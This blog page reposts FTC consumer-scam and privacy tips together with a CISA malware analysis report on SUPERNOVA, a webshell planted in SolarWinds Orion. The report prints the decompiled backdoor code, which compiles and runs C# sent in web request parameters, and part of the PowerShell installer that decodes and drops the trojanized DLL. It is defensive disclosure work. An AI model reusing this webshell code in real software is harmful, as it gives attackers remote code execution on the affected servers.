by Scott Muniz | Jan 29, 2021 | Security
This article was originally posted by the FTC. See the original article here.
Have you ever thought about paying for a training program to learn how to invest in real estate or start an online business? These programs can be pricey — and some make false promises about helping people make money. In fact, the FTC has sued plenty of real estate investment training and online business coaching programs that have done exactly that, while charging people thousands — or even tens of thousands — for those programs.
Pricey deceptive coaching and investment schemes often involve deceptive financing, as well. Today the FTC filed a complaint against Seed Consulting LLC, a company that claims to offer financing to aspiring entrepreneurs interested in buying a training program. But, the FTC says, Seed Consulting is not a lender and doesn’t offer any financing itself. Instead, Seed Consulting charges people $3,000 or more merely to submit credit card applications on their behalf. In addition, the FTC says, Seed Consulting improperly encouraged people to significantly overstate their income to get credit of $50,000 or more on these new cards.
You can probably predict what happened next to people who paid Seed Consulting: according to the FTC, they often ended up mired in debt with lower credit scores while Seed Consulting took in more than $10 million from their funding scheme.
So how do you protect yourself from deceptive training and financing schemes?
- Do your research before you act. Take a few minutes to search online: look for the name of the company and the words “review,” “complaint,” or “scam.”
- Be skeptical of any company that charges you a hefty sum to secure credit card financing. When such financing is warranted, you can typically obtain it directly from the credit card issuer on the Internet or via phone without any middlemen or fees.
- If a company encourages you to inflate your income on a credit application, walk away. Income information on credit applications must be truthful.
- Check out alternatives. Look at free or low-cost info on investing in real estate or starting a business before you buy a big, expensive training program. And certainly do that before racking up charges on new credit cards to pay for it.
- Talk it over with someone first. Tell someone you trust about the details of the investment training program. And tell someone how the company suggests you should finance the cost of that training.
Don’t be pressured into a quick decision. Scammers often say their offer or pricing is only available for a limited time. But deals will always be there. And remember: there’s no such thing as a sure-bet investment that has a high return but little or no risk. If someone offers you one, tell the FTC: ReportFraud.ftc.gov.
Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.
by Scott Muniz | Jan 29, 2021 | Security
This article was originally posted by the FTC. See the original article here.
If you’re facing eviction for any reason, there are organizations out there who can help you. But there are also fake “organizations” and “charities” who can hurt you.
COVID-19 has created an even greater opportunity for scammers to target people — people who are just trying to get help with paying their rent or taking care of other financial needs. Scammers may call, email, or text, saying you can get money for rent. Or they may say they can get you legal help to avoid eviction. No matter what kind of help they promise, these scammers always tell you to give them money up front or hand over your personal information first. But those are dead giveaways that it’s a scam.
Whether someone you don’t know contacts you out of the blue, or you go looking for rental assistance, here are ways to protect yourself:
-
Never give your Social Security, bank account, credit card, or debit card number to anyone who contacts you. And even if you’re the one reaching out, do your research on the organization first, before you share your info.
-
If you look online for help with your rent, search for the name of the groups you find, plus the words “scam,” “fraud,” or “complaint,” to see what others are saying. Do that before you contact them.
-
Find out about local programs that offer rental assistance and other help.
-
If you’re facing eviction, you still have rights. The first step in most evictions is a written notice. Check with your local court system for more details about the eviction process and your rights. You also may qualify for free legal services and be able to speak to a lawyer to learn about your rights.
-
If you spot a rental assistance scam like this, please tell the FTC at ReportFraud.ftc.gov.
Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.
by Scott Muniz | Jan 28, 2021 | Security, Technology
This article is contributed. See the original author and article here.
January 28 is Data Privacy Day (DPD), an annual effort promoting data privacy awareness and education. This year’s DPD events, sponsored by the National Cyber Security Alliance (NCSA), focus on how to Own Your Privacy.
The NCSA teaches users how to protect valuable data online, while encouraging businesses to Respect Privacy by protecting data they collect. CISA encourages users and businesses to visit NCSA’s website to learn more, including several calls to action:
For Individuals: Own Your Privacy
- Personal info is like money. Your purchase history, IP address, or location has tremendous value. Make informed decisions about whether or not to share such data with certain businesses.
- Keep tabs on your apps. Delete unused ones and keep others secure by performing updates.
- Manage your privacy and security settings. Continuously check them to limit what information you share.
For Businesses: Respect Privacy
- If you collect it, protect it. Make sure any personal data you collect is processed in a fair manner and is only collected for relevant and legitimate purposes.
- Consider adopting a privacy framework to manage risk and secure privacy within your organization.
- Asses data collection practices by evaluating which privacy regulations apply to your organization.
- Transparency builds trust. Be honest with customers about how you collect, use, and share their personal information.
- Maintain oversight of partners and vendors. You are responsible for anyone collecting and using your consumers’ personal information.
by Scott Muniz | Jan 28, 2021 | Security
This article was originally posted by the FTC. See the original article here.
Today is National Data Privacy Day, when many organizations and government agencies, including the FTC, join together to raise awareness about privacy issues and to offer tips and information. As more and more of our devices are connected and share information about us, privacy is increasingly important.
There are things you can do to help protect your privacy and limit how you share your information with others. National Data Privacy Day is the perfect time to review some of those steps you can take:
- Know what’s on your device. Do an inventory of all the applications that are on your devices. Consider deleting what you don’t use.
- Check the privacy settings. It’s a good idea to check the privacy settings of apps, devices, and online accounts periodically. You could, for example, review privacy settings when you get a notice from a company telling you that their privacy policies have changed.
- Make sure any software and applications are up to date. This includes your apps, web browsers, and operating systems. Set updates to happen automatically.
- Check the security of your home router. Make sure you’re using a router that has WPA2 or WPA3 encryption to protect the information you share over your wireless network. Public Wi-Fi is not secure, so take precautions if you need to use a public Wi-Fi hotspot.
Check out the FTC’s resources on
privacy and online security for more tips and information. You can also follow the conversation on social media by searching the hashtag #DataPrivacyDay.
If you own a business, you can find information on how to protect your customers’ and employees’ privacy
in this blog series.
Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.
by Scott Muniz | Jan 27, 2021 | Security, Technology
This article is contributed. See the original author and article here.
Original release date: January 27, 2021
body#cma-body {
font-family: Franklin Gothic Medium, Franklin Gothic, ITC Franklin Gothic, Arial, sans-serif;
font-size: 15px;
}
table#cma-table {
width: 900px;
margin: 2px;
table-layout: fixed;
border-collapse: collapse;
}
div#cma-exercise {
width: 900px;
height: 30px;
text-align: center;
line-height: 30px;
font-weight: bold;
font-size: 18px;
}
div.cma-header {
text-align: center;
margin-bottom: 40px;
}
div.cma-footer {
text-align: center;
margin-top: 20px;
}
h2.cma-tlp {
background-color: #000;
color: #ffffff;
width: 180px;
height: 30px;
text-align: center;
line-height: 30px;
font-weight: bold;
font-size: 18px;
float: right;
}
span.cma-fouo {
line-height: 30px;
font-weight: bold;
font-size: 16px;
}
h3.cma-section-title {
font-size: 18px;
font-weight: bold;
padding: 0 10px;
margin-top: 10px;
}
h4.cma-object-title {
font-size: 16px;
font-weight: bold;
margin-left: 20px;
}
h5.cma-data-title {
padding: 3px 0 3px 10px;
margin: 10px 0 0 20px;
background-color: #e7eef4;
font-size: 15px;
}
p.cma-text {
margin: 5px 0 0 25px !important;
word-wrap: break-word !important;
}
div.cma-section {
border-bottom: 5px solid #aaa;
margin: 5px 0;
padding-bottom: 10px;
}
div.cma-avoid-page-break {
page-break-inside: avoid;
}
div#cma-summary {
page-break-after: always;
}
div#cma-faq {
page-break-after: always;
}
table.cma-content {
border-collapse: collapse;
margin-left: 20px;
}
table.cma-hashes {
table-layout: fixed;
width: 880px;
}
table.cma-hashes td{
width: 780px;
word-wrap: break-word;
}
.cma-left th {
text-align: right;
vertical-align: top;
padding: 3px 8px 3px 20px;
background-color: #f0f0f0;
border-right: 1px solid #aaa;
}
.cma-left td {
padding-left: 8px;
}
.cma-color-title th, .cma-color-list th, .cma-color-title-only th {
text-align: left;
padding: 3px 0 3px 20px;
background-color: #f0f0f0;
}
.cma-color-title td, .cma-color-list td, .cma-color-title-only td {
padding: 3px 20px;
}
.cma-color-title tr:nth-child(odd) {
background-color: #f0f0f0;
}
.cma-color-list tr:nth-child(even) {
background-color: #f0f0f0;
}
td.cma-relationship {
max-width: 310px;
word-wrap: break-word;
}
ul.cma-ul {
margin: 5px 0 10px 0;
}
ul.cma-ul li {
line-height: 20px;
margin-bottom: 5px;
word-wrap: break-word;
}
#cma-survey {
font-weight: bold;
font-style: italic;
}
div.cma-banner-container {
position: relative;
text-align: center;
color: white;
}
img.cma-banner {
max-width: 900px;
height: auto;
}
img.cma-nccic-logo {
max-height: 60px;
width: auto;
float: left;
margin-top: -15px;
}
div.cma-report-name {
position: absolute;
bottom: 32px;
left: 12px;
font-size: 20px;
}
div.cma-report-number {
position: absolute;
bottom: 70px;
right: 100px;
font-size: 18px;
}
div.cma-report-date {
position: absolute;
bottom: 32px;
right: 100px;
font-size: 18px;
}
img.cma-thumbnail {
max-height: 100px;
width: auto;
vertical-align: top;
}
img.cma-screenshot {
margin: 10px 0 0 25px;
max-width: 800px;
height: auto;
vertical-align: top;
border: 1px solid #000;
}
div.cma-screenshot-text {
margin: 10px 0 0 25px;
}
.cma-break-word {
word-wrap: break-word;
}
.cma-tag {
border-radius: 5px;
padding: 1px 10px;
margin-right: 10px;
}
.cma-tag-info {
background: #f0f0f0;
}
.cma-tag-warning {
background: #ffdead;
}
Malware Analysis Report
10319053.r1.v1
2021-01-26
Notification
This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
Summary
Description
This report provides detailed analysis of several malicious artifacts, affecting the SolarWinds Orion product, which have been identified by the security company FireEye as SUPERNOVA. According to a SolarWinds advisory, SUPERNOVA is not embedded within the Orion platform as a supply chain attack; rather, it is placed by an attacker directly on a system that hosts SolarWinds Orion and is designed to appear as part of the SolarWinds product. CISA’s assessment is that SUPERNOVA is not part of the SolarWinds supply chain attack described in Alert AA20-352A. See the section in Microsoft’s blog titled “Additional malware discovered” for more information.
This report describes the analysis of a PowerShell script that decodes and installs SUPERNOVA, a malicious webshell backdoor. SUPERNOVA is embedded in a trojanized version of the Solarwinds Orion Web Application module called “App_Web_logoimagehandler.ashx.b6031896.dll.” The SUPERNOVA malware allows a remote operator to dynamically inject C# source code into a web portal provided via the SolarWinds software suite. The injected code is compiled and directly executed in memory.
For a downloadable copy of IOCs, see: MAR-10319053-1.v1.stix.
Submitted Files (3)
02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1 (AssemblyInfo__.ini)
290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 (1.ps1)
c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 (App_Web_logoimagehandler.ashx….)
Findings
290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515
Tags
trojan
Details
| Name |
1.ps1 |
| Size |
10609 bytes |
| Type |
ASCII text, with very long lines |
| MD5 |
4423a4353a0e7972090413deb40d56ad |
| SHA1 |
8004d78e6934efb4dea8baf48a589c2c1ed10bf3 |
| SHA256 |
290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 |
| SHA512 |
5d2dee3c8e4c6a4fa1d84e434ab0b864245fae51360e03ed7338c2b40d7c1d61aad755f8c54615197100dd3b8bfd00d33b256178123002b7c07779c257fa13db |
| ssdeep |
192:9x2OrPgH8XWECNsW4IX4SLY0tqIeZ9StIGca/HjKxnlyImIwN:Fr28XWECNsbIX4SLY0BeZ9StI9OHjMlw |
| Entropy |
4.457683 |
Antivirus
| Microsoft Security Essentials |
Trojan:MSIL/Solorigate.G!dha |
YARA Rules
No matches found.
ssdeep Matches
No matches found.
Relationships
| 290951fcc7… |
Contains |
c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 |
Description
This file is an event log that details the execution of a PowerShell script designed to Base64 decode and install a 32-bit .NET dynamic-link library (DLL) into the following location: “C:inetpubSolarWindsbinApp_Web_logoimagehandler.ashx.b6031896.dll (c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71). The DLL is patched with the SUPERNOVA webshell and is a replacement for a legitimate SolarWinds DLL.
Displayed below is a portion of the event log with the victim information redacted. It indicates the malicious PowerShell was executed by the legitimate SolarWinds application “E:Program Files (x86)SolarWindsOrionSolarWinds.BusinessLayerHost.exe.”
–Begin event log–
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”;$f=”C:inetpubSolarWindsbinApp_Web_logoimagehandler.ashx.b6031896.dll”;$bs=[Convert]::FromBase64String($b);[IO.File]::WriteAllBytes($f $bs)’ ‘S-1-0-0’ ‘-‘ ‘-‘ ‘0x0000000000000000’ ‘E:Program Files (x86)SolarWindsOrionSolarWinds.BusinessLayerHost.exe’ ‘S-1-16-16384’] Computer Name: [redacted].[redacted].net Record Number: 12551353 Event Level: 0
–End event log–
c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71
Tags
backdoortrojan
Details
| Name |
App_Web_logoimagehandler.ashx.b6031896.dll |
| Size |
7680 bytes |
| Type |
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5 |
56ceb6d0011d87b6e4d7023d7ef85676 |
| SHA1 |
75af292f34789a1c782ea36c7127bf6106f595e8 |
| SHA256 |
c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 |
| SHA512 |
f7eac6ab99fe45ca46417cdca36ba27560d5f8a2f37f378ba97636662595d55fa34f749716971aa96a862e37e0199eb6cb905636e6ab0123cfa089adba450629 |
| ssdeep |
192:8/SqRzbt0GBDawA5uT8wSlyDDGTBNFkQ:8/SyHKGBDax5uThDD6BNr |
| Entropy |
4.622450 |
Antivirus
| Ahnlab |
Backdoor/Win32.SunBurst |
| Antiy |
Trojan/MSIL.Agent |
| Avira |
TR/Sunburst.BR |
| BitDefender |
Trojan.Supernova.A |
| Clamav |
Win.Countermeasure.SUPERNOVA-9808999-1 |
| Comodo |
Backdoor |
| Cyren |
W32/Supernova.GYFL-6114 |
| ESET |
a variant of MSIL/SunBurst.A trojan |
| Emsisoft |
Trojan.Supernova.A (B) |
| Ikarus |
Backdoor.Sunburst |
| K7 |
Trojan ( 00574a531 ) |
| Lavasoft |
Trojan.Supernova.A |
| McAfee |
Trojan-sunburst |
| Microsoft Security Essentials |
Trojan:MSIL/Solorigate.G!dha |
| NANOAV |
Trojan.Win32.Sunburst.iduxaq |
| Quick Heal |
Backdoor.Sunburst |
| Sophos |
Mal/Sunburst-B |
| Symantec |
Backdoor.SuperNova |
| Systweak |
trojan-backdoor.sunburst-r |
| TrendMicro |
Trojan.59AF4B5F |
| TrendMicro House Call |
Trojan.59AF4B5F |
| VirusBlokAda |
TScope.Trojan.MSIL |
| Zillya! |
Trojan.SunBurst.Win32.3 |
YARA Rules
No matches found.
ssdeep Matches
| 100 |
5976f9a3f7dcd2c124f1664003a1bb607bc22abc2c95abe5ecd645a5dbfe2c6c |
PE Metadata
| Compile Date |
2020-03-24 05:16:10-04:00 |
| Import Hash |
dae02f32a21e03ce65412f6e56942daa |
| Company Name |
None |
| File Description |
|
| Internal Name |
App_Web_logoimagehandler.ashx.b6031896.dll |
| Legal Copyright |
|
| Original Filename |
App_Web_logoimagehandler.ashx.b6031896.dll |
| Product Name |
None |
| Product Version |
0.0.0.0 |
PE Sections
| MD5 |
Name |
Raw Size |
Entropy |
| 21556dbcb227ba907e33b0847b427ef4 |
header |
512 |
2.597488 |
| 9002a963c87901397a986c3333d09627 |
.text |
5632 |
5.285309 |
| 78888431b10a2bf283387437a750bca3 |
.rsrc |
1024 |
2.583328 |
| 45ded0a8dacde15cb402adfe11b0fe3e |
.reloc |
512 |
0.081539 |
Packers/Compilers/Cryptors
| Microsoft Visual C# / Basic .NET |
Relationships
| c15abaf51e… |
Contained_Within |
290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 |
Description
This file is a 32-bit .NET DLL that has been identified as a modified SolarWinds plug-in. The malware patched into this plug-in has been identified as SUPERNOVA. The modification includes the “DynamicRun” export function which is designed to accept and parse provided arguments. The arguments are expected to partially contain C# code, which the function will compile and execute directly in system memory. The purpose of this malware indicates the attacker has identified a vulnerability allowing the ability to dynamically provide a custom “HttpContext” data structure to the web application’s “ProcessRequest” function.
The ProcessRequest function takes an HttpContext Data structure as an argument. It parses portions of the request substructure of the parent HttpContext data structure using the keys “codes”, “clazz”, “method”, and “args”. The parsed data is placed in the respective variables codes, clazz, method, and args. These four variables are then provided as arguments to the DynamicRun function described next.
The “DynamicRun” function is designed to accept C# code and then dynamically compile and execute it. The “codes” variable provided to the function contains the actual C# code. The “clazz” variable provides the class name that is used when compiling the source code. The “method” variable will contain the function name that will be called for the newly compiled class. The “args” variable will contain the arguments provided to the executed malicious class.
After parsing out and executing the provided code, the “ProcessRequest” function will continue on to call a function named “WebSettingsDAL.get_NewNOCSiteLogo.” Analysis indicates this is a valid SolarWinds function designed to render the product logo on a web application.
–Begin ProcessRequest Function–
public void ProcessRequest(HttpContext context)
{
try
{
string codes = context.Request[“codes”];
string clazz = context.Request[“clazz”];
string method = context.Request[“method”];
string[] args = context.Request[“args”].Split(‘n’);
context.Response.ContentType = “text/plain”;
context.Response.Write(this.DynamicRun(codes, clazz, method, args));
}
catch (Exception ex)
{
}
NameValueCollection queryString = HttpUtility.ParseQueryString(context.Request.Url.Query);
try
{
string str1 = queryString[“id”];
string s;
if (!(str1 == “SitelogoImage”))
{
if (!(str1 == “SiteNoclogoImage”))
throw new ArgumentOutOfRangeException(queryString[“id”]);
s = WebSettingsDAL.get_NewNOCSiteLogo();
}
else
s = WebSettingsDAL.get_NewSiteLogo();
byte[] buffer = Convert.FromBase64String(s);
if ((buffer == null || buffer.Length == 0) && File.Exists(HttpContext.Current.Server.MapPath(“//NetPerfMon//images//NoLogo.gif”)))
buffer = File.ReadAllBytes(HttpContext.Current.Server.MapPath(“//NetPerfMon//images//NoLogo.gif”));
string str2 = buffer.Length < 2 || buffer[0] != byte.MaxValue || buffer[1] != (byte) 216 ? (buffer.Length < 3 || buffer[0] != (byte) 71 || (buffer[1] != (byte) 73 || buffer[2] != (byte) 70) ? (buffer.Length < 8 || buffer[0] != (byte) 137 || (buffer[1] != (byte) 80 || buffer[2] != (byte) 78) || (buffer[3] != (byte) 71 || buffer[4] != (byte) 13 || (buffer[5] != (byte) 10 || buffer[6] != (byte) 26)) || buffer[7] != (byte) 10 ? “image/jpeg” : “image/png”) : “image/gif”) : “image/jpeg”;
context.Response.OutputStream.Write(buffer, 0, buffer.Length);
context.Response.ContentType = str2;
context.Response.Cache.SetCacheability(HttpCacheability.Private);
context.Response.StatusDescription = “OK”;
context.Response.StatusCode = 200;
return;
}
catch (Exception ex)
{
LogoImageHandler._log.Error((object) “Unexpected error trying to provide logo image for the page.”, ex);
}
context.Response.Cache.SetCacheability(HttpCacheability.NoCache);
context.Response.StatusDescription = “NO IMAGE”;
context.Response.StatusCode = 500;
}
–End ProcessRequest Function–
–Begin DynamicRun Function–
public string DynamicRun(string codes, string clazz, string method, string[] args)
{
ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();
CompilerParameters options = new CompilerParameters();
options.ReferencedAssemblies.Add(“System.dll”);
options.ReferencedAssemblies.Add(“System.ServiceModel.dll”);
options.ReferencedAssemblies.Add(“System.Data.dll”);
options.ReferencedAssemblies.Add(“System.Runtime.dll”);
options.GenerateExecutable = false;
options.GenerateInMemory = true;
string source = codes;
CompilerResults compilerResults = compiler.CompileAssemblyFromSource(options, source);
if (compilerResults.Errors.HasErrors)
{
// ISSUE: reference to a compiler-generated field
// ISSUE: reference to a compiler-generated field
// ISSUE: reference to a compiler-generated field
// ISSUE: method pointer
string.Join(Environment.NewLine, (IEnumerable<string>) Enumerable.Select<CompilerError, string>((IEnumerable<M0>) compilerResults.Errors.Cast<CompilerError>(), (Func<M0, M1>) (LogoImageHandler.u003Cu003Ec.u003Cu003E9__3_0 ?? (LogoImageHandler.u003Cu003Ec.u003Cu003E9__3_0 = new Func<CompilerError, string>((object) LogoImageHandler.u003Cu003Ec.u003Cu003E9, __methodptr(u003CDynamicRunu003Eb__3_0))))));
Console.WriteLine(“error”);
return compilerResults.Errors.ToString();
}
object instance = compilerResults.CompiledAssembly.CreateInstance(clazz);
return (string) instance.GetType().GetMethod(method).Invoke(instance, (object[]) args);
}
–End DynamicRun Function–
Screenshots
Figure 1 – Screenshot of the modification.
02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1
Details
| Name |
AssemblyInfo__.ini |
| Size |
252 bytes |
| Type |
data |
| MD5 |
a73fd263da660c56650426eff8299c7d |
| SHA1 |
ab9ed07e59e1e284914ad6d6be74a0985dff703a |
| SHA256 |
02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1 |
| SHA512 |
9c65aecd80510244a16335a925b2b3b722d56a1c9fdc06267aee5c576b4346d9e60c03bfbf3c67729c6bd5d0fc3511fb479be5aa662cd322bd2f238129a28bd0 |
| ssdeep |
6:cP6SlI9Dol1BnUfKr+2kiRWa6SlI9Dol1Bne:s1qD41hKKr+2NRWa1qD41he |
| Entropy |
3.389300 |
Antivirus
No matches found.
YARA Rules
No matches found.
ssdeep Matches
No matches found.
Description
This file contains the following text:
–Begin text–
App_Web_logoimagehandler.ashx.b6031896,0.0.0.0,, file:///C:/InetPub/SolarWinds/bin/App_Web_logoimagehandler.ashx.b6031896.dll
–End text–
Relationship Summary
| 290951fcc7… |
Contains |
c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 |
| c15abaf51e… |
Contained_Within |
290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 |
Recommendations
CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.
- Maintain up-to-date antivirus signatures and engines.
- Keep operating system patches up-to-date.
- Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
- Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
- Enforce a strong password policy and implement regular password changes.
- Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
- Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
- Disable unnecessary services on agency workstations and servers.
- Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
- Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
- Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
- Scan all software downloaded from the Internet prior to executing.
- Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).
Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.
Contact Information
CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/
Document FAQ
What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.
Can I submit malware to CISA? Malware samples can be submitted via three methods:
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.
|
This product is provided subject to this Notification and this Privacy & Use policy.
by Scott Muniz | Jan 27, 2021 | Security
This article was originally posted by the FTC. See the original article here.
You may know the FTC for its consumer information, and for taking action against shady companies that violate the law. But did you know the FTC returns millions of dollars to people because of those actions? Last year, the FTC's cases returned $483 million to people nationwide and in 64 countries.
Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.
Recent Comments